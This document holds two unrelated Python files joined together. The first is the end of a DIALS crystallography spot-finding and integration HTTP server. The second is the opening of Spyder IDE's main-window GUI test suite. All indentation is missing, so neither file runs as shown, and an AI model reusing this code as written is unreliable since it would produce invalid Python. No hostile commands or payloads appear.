stats["n_indexed"] = indexed_sel.count(True)
stats["fraction_indexed"] = indexed_sel.count(True) / len(reflections)
except Exception as e:
logger.error(e)
stats["error"] = str(e)
finally:
t3 = time.time()
logger.info("Indexing took %.2f seconds" % (t3 - t2))
if integrate and "lattices" in stats:
from dials.algorithms.integration.integrator import create_integrator
from dials.algorithms.profile_model.factory import ProfileModelFactory
from dials.command_line.integrate import phil_scope as integrate_phil_scope
interp = integrate_phil_scope.command_line_argument_interpreter()
phil_scope, unhandled = interp.process_and_fetch(
unhandled, custom_processor="collect_remaining"
)
logger.error("The following integration parameters have been modified:")
integrate_phil_scope.fetch_diff(source=phil_scope).show()
params = phil_scope.extract()
try:
params.profile.gaussian_rs.min_spots = 0
experiments = idxr.refined_experiments
reference = idxr.refined_reflections
predicted = flex.reflection_table.from_predictions_multi(
experiments,
dmin=params.prediction.d_min,
dmax=params.prediction.d_max,
margin=params.prediction.margin,
force_static=params.prediction.force_static,
)
matched, reference, unmatched = predicted.match_with_reference(
reference
)
assert len(matched) == len(predicted)
assert matched.count(True) <= len(reference)
if matched.count(True) == 0:
raise Sorry(
"""
Invalid input for reference reflections.
Zero reference spots were matched to predictions
"""
)
elif matched.count(True) != len(reference):
logger.info("")
logger.info("*" * 80)
logger.info(
"Warning: %d reference spots were not matched to predictions"
% (len(reference) - matched.count(True))
)
logger.info("*" * 80)
logger.info("")
# Compute the profile model
experiments = ProfileModelFactory.create(params, experiments, reference)
# Compute the bounding box
predicted.compute_bbox(experiments)
# Create the integrator
integrator = create_integrator(params, experiments, predicted)
# Integrate the reflections
reflections = integrator.integrate()
# print len(reflections)
stats["integrated_intensity"] = flex.sum(
reflections["intensity.sum.value"]
)
except Exception as e:
logger.error(e)
stats["error"] = str(e)
finally:
t4 = time.time()
logger.info("Integration took %.2f seconds" % (t4 - t3))
return stats
class handler(server_base.BaseHTTPRequestHandler):
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/xml")
s.end_headers()
if s.path == "/Ctrl-C":
global stop
stop = True
return
filename = s.path.split(";")[0]
params = s.path.split(";")[1:]
# If we're passing a url through, then unquote and ignore leading /
if "%3A//" in filename:
filename = urllib.parse.unquote(filename[1:])
d = {"image": filename}
try:
stats = work(filename, params)
d.update(stats)
except Exception as e:
d["error"] = str(e)
response = json.dumps(d).encode("latin-1")
s.wfile.write(response)
def serve(httpd):
try:
while not stop:
httpd.handle_request()
except KeyboardInterrupt:
pass
phil_scope = libtbx.phil.parse(
"""\
nproc = Auto
.type = int(value_min=1)
port = 1701
.type = int(value_min=1)
"""
)
def main(nproc, port):
server_class = server_base.HTTPServer
httpd = server_class(("", port), handler)
print(time.asctime(), "Serving %d processes on port %d" % (nproc, port))
for j in range(nproc - 1):
proc = Process(target=serve, args=(httpd,))
proc.daemon = True
proc.start()
serve(httpd)
httpd.server_close()
print(time.asctime(), "done")
if __name__ == "__main__":
usage = "dials.find_spots_server [options]"
from dials.util.options import OptionParser
parser = OptionParser(usage=usage, phil=phil_scope, epilog=help_message)
params, options = parser.parse_args(show_diff_phil=True)
if params.nproc is libtbx.Auto:
from libtbx.introspection import number_of_processors
params.nproc = number_of_processors(return_value_if_unknown=-1)
main(params.nproc, params.port)
|
test_mainwindow.py | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright © Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
"""
Tests for the main window.
"""
# Standard library imports
import os
import os.path as osp
import re
import shutil
import sys
import tempfile
from textwrap import dedent
from unittest.mock import Mock, MagicMock
import uuid
# Third party imports
from flaky import flaky
import ipykernel
from IPython.core import release as ipy_release
from jupyter_client.manager import KernelManager
from matplotlib.testing.compare import compare_images
import nbconvert
import numpy as np
from numpy.testing import assert_array_equal
import pkg_resources
from pkg_resources import parse_version
import pylint
import pytest
from qtpy import PYQT5, PYQT_VERSION
from qtpy.QtCore import Qt, QTimer, QUrl
from qtpy.QtTest import QTest
from qtpy.QtGui import QImage
from qtpy.QtWidgets import (QAction, QApplication, QFileDialog, QLineEdit,
QTabBar, QWidget)
from qtpy.QtWebEngineWidgets import WEBENGINE
# Local imports
from spyder import __trouble_url__, __project_url__
from spyder.api.utils import get_class_values
from spyder.api.widgets.auxiliary_widgets import SpyderWindowWidget
from spyder.app import start
from spyder.app.mainwindow import MainWindow
from spyder.config.base import get_home_dir, get_conf_path, get_module_path
from spyder.config.manager import CONF
from spyder.plugins.base import PluginWindow
from spyder.plugins.help.widgets import ObjectComboBox
from spyder.plugins.help.tests.test_plugin import check_text
from spyder.plugins.ipythonconsole.utils.kernelspec import SpyderKernelSpec
from spyder.plugins.layout.layouts import DefaultLayouts
from spyder.plugins.projects.api import EmptyProject
from spyder.py3compat import PY2, to_text_string
from spyder.utils.misc import remove_backslashes
from spyder.widgets.dock import DockTitleBar
# =============================================================================
# ---- Constants
# =============================================================================
# Location of this file
LOCATION = osp.realpath(osp.join(os.getcwd(), osp.dirname(__file__)))
# Time to wait until the IPython console is ready to receive input
# (in milliseconds)
SHELL_TIMEOUT = 40000 if os.name == 'nt' else 20000
# Need longer EVAL_TIMEOUT, because need to cythonize and C compile ".pyx" file
# before import and eval it
COMPILE_AND_EVAL_TIMEOUT = 30000
# Time to wait for the IPython console to evaluate something (in
# milliseconds)
EVAL_TIMEOUT = 3000
# =============================================================================
# ---- Utility functions
# =============================================================================
def open_file_in_editor(main_window, fname, directory=None):
"""Open a file using the Editor and its open file dialog"""
top_level_widgets = QApplication.topLevelWidgets()
for w in top_level_widgets:
if isinstance(w, QFileDialog):
if directory is not None:
w.setDirectory(directory)
input_field = w.findChildren(QLineEdit)[0]
input_field.setText(fname)
QTest.keyClick(w, Qt.Key_Enter)
def get_thirdparty_plugin(main_window, plugin_title):
"""Get a reference to the thirdparty plugin with the title given."""
for plugin in main_window.thirdparty_plugins:
try:
# New API
if plugin.get_name() == plugin_title:
return plugin
except AttributeError:
# Old API
if plugin.get_plugin_title() == plugin_title:
return plugin
def reset_run_code(qtbot, shell, code_editor, nsb):
"""Reset state after a run code test"""
qtbot.waitUntil(lambda: not shell._executing)
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
def start_new_kernel(startup_timeout=60, kernel_name='python', spykernel=False,
**kwargs):
"""Start a new kernel, and return its Manager and Client"""
km = KernelManager(kernel_name=kernel_name)
if spykernel:
km._kernel_spec = SpyderKernelSpec()
km.start_kernel(**kwargs)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=startup_timeout)
except RuntimeError:
kc.stop_channels()
km.shutdown_kernel()
raise
return km, kc
def find_desired_tab_in_window(tab_name, window):
all_tabbars = window.findChildren(QTabBar)
for current_tabbar in all_tabbars:
for tab_index in range(current_tabbar.count()):
if current_tabbar.tabText(tab_index) == str(tab_name):
return current_tabbar, tab_index
return None, None
def register_fake_entrypoints():
"""
Create entry points distribution to register elements:
* Completion providers (Fallback, Shippets, LSP)
* Puglins (SpyderBoilerplate plugin)
"""
# Completion providers
fallback = pkg_resources.EntryPoint.parse(
'fallback = spyder.plugins.completion.providers.fallback.provider:'
'FallbackProvider'
)
snippets = pkg_resources.EntryPoint.parse(
'snippets = spyder.plugins.completion.providers.snippets.provider:'
'SnippetsProvider'
)
lsp = pkg_resources.EntryPoint.parse(
'lsp = spyder.plugins.completion.providers.languageserver.provider:'
'LanguageServerProvider'
)
# Extra plugins
spyder_boilerplate = pkg_resources.EntryPoint.parse(
'spyder_boilerplate = spyder.app.tests.spyder_boilerplate.spyder.'
'plugin:SpyderBoilerplate'
)
# Create a fake Spyder distribution
d = pkg_resources.Distribution(__file__)
# Add the providers and plugins to the fake EntryPoints
d._ep_map = {
'spyder.completions': {
'fallback': fallback,
'snippets': snippets,
'lsp': lsp
},
'spyder.plugins': {
'spyder_boilerplate': spyder_boilerplate
}
}
# Add the fake distribution to the global working_set
pkg_resources.working_set.add(d, 'spyder')
def remove_fake_entrypoints():
"""Remove fake entry points from pkg_resources"""
try:
pkg_resources.working_set.by_key.pop('unknown')
pkg_resources.working_set.entry_keys.pop('spyder')
pkg_resources.working_set.entry_keys.pop(__file__)
pkg_resources.working_set.entries.remove('spyder')
except KeyError:
pass
# =============================================================================
# ---- Fixtures
# =============================================================================
@pytest.fixture
def main_window(request, tmpdir):
"""Main Window fixture"""
register_fake_entrypoints()
# Tests assume inline backend
CONF.set('ipython_console', 'pylab/backend', 0)
# Test assume the plots are rendered in the console as png
CONF.set('plots', 'mute_inline_plotting', False)
CONF.set('ipython_console', 'pylab/inline/figure_format', 0)
# Set exclamation mark to True
CONF.set('ipython_console', 'pdb_use_exclamation_mark', True)
# Check if we need to use introspection in a given test
# (it's faster and less memory consuming not to use it!)
use_introspection = request.node.get_closest_marker('use_introspection')
if use_introspection:
os.environ['SPY_TEST_USE_INTROSPECTION'] = 'True'
else:
try:
os.environ.pop('SPY_TEST_USE_INTROSPECTION')
except KeyError:
pass
# Only use single_instance mode for tests that require it
single_instance = request.node.get_closest_marker('single_instance')
if single_instance:
CONF.set('main', 'single_instance', True)
else:
CONF.set('main', 'single_instance', False)
# Check if we need to preload a project in a give test
preload_project = request.node.get_closest_marker('preload_project')
if preload_project:
# Create project
project_path = str(tmpdir.mkdir('test_project'))
project = EmptyProject(project_path)
CONF.set('project_explorer', 'current_project_path', project_path)
# Add some files to project
filenames = [
osp.join(project_path, f) for f in
['file1.py', 'file2.py', 'file3.txt']
]
for filename in filenames:
with open(filename, 'w') as f:
if osp.splitext(filename)[1] == '.py':
f.write("def f(x):\n"
" return x\n")
else:
f.write("Hello world!")
project.set_recent_files(filenames)
else:
CONF.set('project_explorer', 'current_project_path', None)
# Get config values passed in parametrize and apply them
try:
param = request.param
if isinstance(param, dict) and 'spy_config' in param:
CONF.set(*param['spy_config'])
except AttributeError:
pass
if not hasattr(main_window, 'window'):
# Start the window
window = start.main()
main_window.window = window
else:
window = main_window.window
# Close everything we can think of
window.editor.close_file()
window.projects.close_project()
if window.console.error_dialog:
window.console.close_error_dialog()
window.switcher.close()
for client in window.ipyconsole.get_clients():
window.ipyconsole.close_client(client=client, force=True)
window.outlineexplorer.stop_symbol_services('python')
# Reset cwd
window.explorer.chdir(get_home_dir())
# Remove Kite (In case it was registered via setup.py)
window.completions.providers.pop('kite', None)
yield window
# Print shell content if failed
if request.node.rep_setup.passed:
if request.node.rep_call.failed:
# Print content of shellwidget and close window
print(window.ipyconsole.get_current_shellwidget(
)._control.toPlainText())
# Print info page content is not blank
console = window.ipyconsole
client = console.get_current_client()
if client.info_page != client.blank_page:
print('info_page')
print(client.info_page)
window.close()
del main_window.window
@pytest.fixture(scope="session", autouse=True)
def cleanup(request):
"""Cleanup a testing directory once we are finished."""
def remove_test_dir():
if hasattr(main_window, 'window'):
try:
main_window.window.close()
except AttributeError:
pass
remove_fake_entrypoints()
request.addfinalizer(remove_test_dir)
# =============================================================================
# ---- Tests
# =============================================================================
@pytest.mark.slow
@pytest.mark.order(1)
@pytest.mark.single_instance
@pytest.mark.skipif(os.environ.get('CI', None) is None,
reason="It's not meant to be run outside of CIs")
def test_single_instance_and_edit_magic(main_window, qtbot, tmpdir):
"""Test single instance mode and %edit magic."""
editorstack = main_window.editor.get_current_editorstack()
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
spy_dir = osp.dirname(get_module_path('spyder'))
lock_code = (
"import sys\n"
"sys.path.append(r'{spy_dir_str}')\n"
"from spyder.utils.external import lockfile\n"
"lock_file = r'{lock_file}'\n"
"lock = lockfile.FilesystemLock(lock_file)\n"
"lock_created = lock.lock()\n"
"print(lock_created)".format(
spy_dir_str=spy_dir,
lock_file=get_conf_path('spyder.lock'))
)
with qtbot.waitSignal(shell.executed, timeout=2000):
shell.execute(lock_code)
assert not shell.get_value('lock_created')
# Test %edit magic
n_editors = editorstack.get_stack_count()
p = tmpdir.mkdir("foo").join("bar.py")
p.write(lock_code)
with qtbot.waitSignal(shell.executed):
shell.execute('%edit {}'.format(to_text_string(p)))
qtbot.wait(3000)
assert editorstack.get_stack_count() == n_editors + 1
assert editorstack.get_current_editor().toPlainText() == lock_code
main_window.editor.close_file()
@pytest.mark.slow
def test_lock_action(main_window):
"""Test the lock interface action."""
action = main_window.layouts.lock_interface_action
plugins = main_window.widgetlist
# By default the interface is locked.
assert main_window.layouts._interface_locked
# In this state the title bar is an empty QWidget
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert not isinstance(title_bar, DockTitleBar)
assert isinstance(title_bar, QWidget)
# Test that our custom title bar is shown when the action
# is triggered.
action.trigger()
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert isinstance(title_bar, DockTitleBar)
assert not main_window.layouts._interface_locked
# Restore default state
action.trigger()
assert main_window.layouts._interface_locked
@pytest.mark.slow
@pytest.mark.order(1)
@pytest.mark.skipif(os.name == 'nt' and PY2, reason="Fails on win and py2")
def test_default_plugin_actions(main_window, qtbot):
"""Test the effect of dock, undock, close and toggle view actions."""
# Use a particular plugin
file_explorer = main_window.explorer
main_widget = file_explorer.get_widget()
# Undock action
main_widget.undock_action.triggered.emit(True)
qtbot.wait(500)
assert not file_explorer.dockwidget.isVisible()
assert main_widget.undock_action is not None
assert isinstance(main_widget.windowwidget, SpyderWindowWidget)
assert main_widget.windowwidget.centralWidget() == main_widget
# Dock action
main_widget.dock_action.triggered.emit(True)
qtbot.wait(500)
assert file_explorer.dockwidget.isVisible()
assert main_widget.windowwidget is None
# Close action
main_widget.close_action.triggered.emit(True)
qtbot.wait(500)
assert not file_explorer.dockwidget.isVisible()
assert not file_explorer.toggle_view_action.isChecked()
# Toggle view action
file_explorer.toggle_view_action.setChecked(True)
assert file_explorer.dockwidget.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize('main_window', [{'spy_config': ('main', 'opengl', 'software')}], indirect=True)
def test_opengl_implementation(main_window, qtbot):
"""
Test that we are setting the selected OpenGL implementation
"""
assert main_window._test_setting_opengl('software')
# Restore default config value
CONF.set('main', 'opengl', 'automatic')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
np.__version__ < '1.14.0' or (os.name == 'nt' and PY2),
reason="This only happens in Numpy 1.14+"
)
@pytest.mark.parametrize('main_window', [{'spy_config': ('variable_explorer', 'minmax', True)}], indirect=True)
def test_filter_numpy_warning(main_window, qtbot):
"""
Test that we filter a warning shown when an array contains nan
values and the Variable Explorer option 'Show arrays min/man'
is on.
For spyder-ide/spyder#7063.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create an array with a nan value
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np; A=np.full(16, np.nan)')
qtbot.wait(1000)
# Assert that no warnings are shown in the console
assert "warning" not in control.toPlainText()
assert "Warning" not in control.toPlainText()
# Restore default config value
CONF.set('variable_explorer', 'minmax', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2 or not sys.platform == 'darwin',
reason="Times out in PY2 and fails on other than macOS")
def test_get_help_combo(main_window, qtbot):
"""
Test that Help can display docstrings for names typed in its combobox.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
if WEBENGINE:
webpage = webview.page()
else:
webpage = webview.page().mainFrame()
# --- From the console ---
# Write some object in the console
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np')
# Get help - numpy
object_combo = help_plugin.get_widget().object_combo
object_combo.setFocus()
qtbot.keyClicks(object_combo, 'numpy', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - numpy.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
# Get help - np
# Clear combo
object_combo.set_current_text('')
qtbot.keyClicks(object_combo, 'np', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - np.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_dot_notation(main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
with dot calls i.e np.sin
See spyder-ide/spyder#11821
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name
qtbot.keyClicks(control, u'np.linalg.norm')
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(
lambda: check_text(webpage, "Matrix or vector norm."),
timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_special_characters(
main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
for unusual characters.
See spyder-ide/spyder#7699
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name and assert in Console
def check_control(control, value):
return value in control.toPlainText()
qtbot.keyClicks(control, u'aa\t')
qtbot.waitUntil(lambda: check_control(control, u'aaʹbb'), timeout=2000)
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "This function docstring."),
timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' and os.environ.get('CI') is not None,
reason="Times out on AppVeyor")
def test_get_help_ipython_console(main_window, qtbot):
"""Test that Help works when called from the IPython console."""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write some object in the console
qtbot.keyClicks(control, 'runfile')
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "namespace"), timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Does not work on Mac and Windows!")
@pytest.mark.use_introspection
@pytest.mark.parametrize(
"object_info",
[("range", "range"),
("import matplotlib.pyplot as plt",
"The object-oriented API is recommended for more complex plots.")])
def test_get_help_editor(main_window, qtbot, object_info):
"""Test that Help works when called from the Editor."""
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
main_window.editor.new(fname="test.py", text="")
code_editor = main_window.editor.get_focus_widget()
editorstack = main_window.editor.get_current_editorstack()
with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
# Write some object in the editor
object_name, expected_text = object_info
code_editor.set_text(object_name)
code_editor.move_cursor(len(object_name))
with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_change()
# Get help
with qtbot.waitSignal(code_editor.sig_display_object_info, timeout=30000):
editorstack.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, expected_text), timeout=30000)
@pytest.mark.slow
def test_window_title(main_window, tmpdir):
"""Test window title with non-ascii characters."""
projects = main_window.projects
# Create a project in non-ascii path
path = to_text_string(tmpdir.mkdir(u'測試'))
projects.open_project(path=path)
# Set non-ascii window title
main_window.window_title = u'اختبار'
# Assert window title is computed without errors
# and has the expected strings
main_window.set_window_title()
title = main_window.base_title
assert u'Spyder' in title
assert u'Python' in title
assert u'اختبار' in title
assert u'測試' in title
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or PY2, reason="It fails sometimes")
@pytest.mark.parametrize(
"debugcell", [True, False])
def test_move_to_first_breakpoint(main_window, qtbot, debugcell):
"""Test that we move to the first breakpoint if there's one present."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=10)
qtbot.wait(500)
cursor = code_editor.textCursor()
cursor.setPosition(0)
code_editor.setTextCursor(cursor)
if debugcell:
# Advance 2 cells
for i in range(2):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Debug the cell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
# Make sure everything is ready
assert shell.spyder_kernel_comm.is_open()
assert shell.is_waiting_pdb_input()
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!b')
assert 'script.py:10' in shell._control.toPlainText()
# We need to press continue as we don't test yet if a breakpoint
# is in the cell
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!c')
else:
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Verify that we are at first breakpoint
shell.clear_console()
qtbot.wait(500)
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!list")
assert "1--> 10 arr = np.array(li)" in control.toPlainText()
# Exit debugging
shell.pdb_execute("!exit")
qtbot.wait(500)
# Set breakpoint on first line with code
code_editor.debugger.toogle_breakpoint(line_number=2)
qtbot.wait(500)
# Click the debug button
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Verify that we are still on debugging
try:
assert shell.is_waiting_pdb_input()
except Exception:
print('Shell content: ', shell._control.toPlainText(), '\n\n')
raise
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason='Fails on windows!')
def test_runconfig_workdir(main_window, qtbot, tmpdir):
"""Test runconfig workdir options."""
from spyder.plugins.run.widgets import RunConfiguration
CONF.set('run', 'configurations', [])
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Use cwd for this file ---
rc = RunConfiguration().get()
rc['file_dir'] = False
rc['cw_dir'] = True
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in cwd after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == get_home_dir()
# --- Use fixed execution dir for test file ---
temp_dir = str(tmpdir.mkdir("test_dir"))
rc['file_dir'] = False
rc['cw_dir'] = False
rc['fixed_dir'] = True
rc['dir'] = temp_dir
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in fixed dir after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == temp_dir
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It's failing there")
def test_dedicated_consoles(main_window, qtbot):
"""Test running code in dedicated consoles."""
from spyder.plugins.run.widgets import RunConfiguration
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Set run options for this file ---
rc = RunConfiguration().get()
# A dedicated console is used when these two options are False
rc['current'] = rc['systerm'] = False
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file and assert that we get a dedicated console ---
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
nsb = main_window.variableexplorer.current_widget()
assert len(main_window.ipyconsole.get_clients()) == 2
assert main_window.ipyconsole.filenames == ['', test_file]
assert main_window.ipyconsole.tabwidget.tabText(1) == 'script.py/A'
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 4
# --- Assert only runfile text is present and there's no banner text ---
# See spyder-ide/spyder#5301.
text = control.toPlainText()
assert ('runfile' in text) and not ('Python' in text or 'IPython' in text)
# --- Clean namespace after re-execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('zz = -1')
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
assert not shell.is_defined('zz')
# --- Assert runfile text is present after reruns ---
assert 'runfile' in control.toPlainText()
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
def test_connection_to_external_kernel(main_window, qtbot):
"""Test that only Spyder kernels are connected to the Variable Explorer."""
# Test with a generic kernel
km, kc = start_new_kernel()
main_window.ipyconsole._create_client_for_kernel(kc.connection_file, None,
None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that there are no variables in the variable explorer
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 0
python_shell = shell
# Test with a kernel from Spyder
spykm, spykc = start_new_kernel(spykernel=True)
main_window.ipyconsole._create_client_for_kernel(spykc.connection_file, None,
None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that a variable is visible in the variable explorer
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 1
# Test runfile in external_kernel
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(
"print(2 + 1)"
)
# Start running
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(run_button, Qt.LeftButton)
assert "runfile" in shell._control.toPlainText()
assert "3" in shell._control.toPlainText()
# Try quitting the kernels
shell.execute('quit()')
python_shell.execute('quit()')
qtbot.wait(1000)
# Make sure everything quit properly
assert km.kernel.poll() is not None
assert spykm.kernel.poll() is not None
if spykm._restarter:
assert spykm._restarter.poll() is not None
if km._restarter:
assert km._restarter.poll() is not None
# Close the channels
spykc.stop_channels()
kc.stop_channels()
@pytest.mark.order(1)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_change_types_in_varexp(main_window, qtbot):
"""Test that variable types can't be changed in the Variable Explorer."""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Try to change types
qtbot.keyClicks(QApplication.focusWidget(), "'s'")
qtbot.keyClick(QApplication.focusWidget(), Qt.Key_Enter)
qtbot.wait(1000)
# Assert object remains the same
assert shell.get_value('a') == 10
